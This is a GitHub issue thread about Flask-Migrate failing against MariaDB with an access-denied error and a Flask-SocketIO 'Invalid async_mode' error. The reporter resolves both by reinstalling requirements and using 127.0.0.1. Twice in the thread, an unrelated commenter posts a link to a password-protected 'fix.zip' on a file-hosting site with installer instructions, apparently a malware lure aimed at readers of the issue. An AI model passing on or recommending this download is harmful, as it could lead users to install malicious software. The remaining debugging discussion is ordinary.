### ISSUE TITLE
Issue with Flask-Migrate -  Access denied for user 'web'@'localhost' (using password: YES)

### ISSUE THREAD

**Issue by martenzo7** [miguelgrinberg/Flask-Migrate#550]
I am experiencing issues with integrating Flask-Migrate with MariaDB for my Flask application. Specifically, I am encountering the following problems:
```
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://web:<PASSOWRD>@localhost/database'

```
or 
```
app.config['SQLALCHEMY_DATABASE_URI'] = 'mariadb+mariadbconnector://web:<PASSWORD>@localhost/database'

```
```
sqlalchemy.exc.OperationalError: (mariadb.OperationalError) Access denied for user 'web'@'localhost' (using password: YES)
```

The Flask app is functioning correctly, and I successfully created the database without issues. 

I tested migrations with a simpler application and it worked fine. However, when I integrated Flask-SocketIO models, the Access denied error showed. It seems that Flask-SocketIO might be causing the issue, though I could be mistaken.

**Comment by martenzo7** [comment]
update: flask_migrate seems to have issue with


```
File "/usr/lib/python3/dist-packages/flask/cli.py", line 245, in locate_app
    __import__(module_name)
  File "/tmp/test2/test.py", line 9, in <module>
    socketio = SocketIO(flask)

```

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by miguelgrinberg** [comment]
Please provide the complete stack trace of the error.

**Comment by martenzo7** [comment]
sure, 

here is the app that I'm using:
```
from flask import Flask, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate

app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mariadb+pymysql://username:password@127.0.0.1/dbname'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False

db = SQLAlchemy(app)
socketio = SocketIO(app)
migrate = Migrate(app, db)

class User(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True, nullable=False)
    email = db.Column(db.String(120), unique=True, nullable=False)

    def __repr__(self):
        return f'<User {self.username}>'

@app.route('/')
def index():
    return jsonify({'message': 'Hello, World!'})

if __name__ == '__main__':
    app.run(debug=True)
```


`flask db init` output(Note: Removing socketio resolves the issue):
```
Traceback (most recent call last):
  File "/usr/bin/flask", line 8, in <module>
    sys.exit(main())
             ^^^^^^
  File "/usr/lib/python3/dist-packages/flask/cli.py", line 1105, in main
    cli.main()
  File "/usr/lib/python3/dist-packages/click/core.py", line 1078, in main
    rv = self.invoke(ctx)
         ^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/click/core.py", line 1682, in invoke
    cmd_name, cmd, args = self.resolve_command(ctx, args)
                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/click/core.py", line 1729, in resolve_command
    cmd = self.get_command(ctx, cmd_name)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/flask/cli.py", line 611, in get_command
    app = info.load_app()
          ^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/flask/cli.py", line 335, in load_app
    app = locate_app(import_name, name)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/flask/cli.py", line 245, in locate_app
    __import__(module_name)
  File "/tmp/test/test.py", line 12, in <module>
    socketio = SocketIO(app)
               ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/flask_socketio/__init__.py", line 187, in __init__
    self.init_app(app, **kwargs)
  File "/usr/lib/python3/dist-packages/flask_socketio/__init__.py", line 243, in init_app
    self.server = socketio.Server(**self.server_options)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/socketio/base_server.py", line 31, in __init__
    self.eio = self._engineio_server_class()(**engineio_options)
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/engineio/base_server.py", line 81, in __init__
    raise ValueError('Invalid async_mode specified')
ValueError: Invalid async_mode specified

```

**Comment by martenzo7** [comment]
hi,

I managed to fix it by regenerating the `env/` folder and reinstalling the requirements. It's working now, but the cause of the issue is still unclear. Also the access denied issue is fixed by changing `localhost` to `127.0.0.1`.

working code:
 `app.config['SQLALCHEMY_DATABASE_URI'] = 'mariadb+mariadbconnector://<USERNAME>:<PASSWORD>@127.0.0.1/database'
`
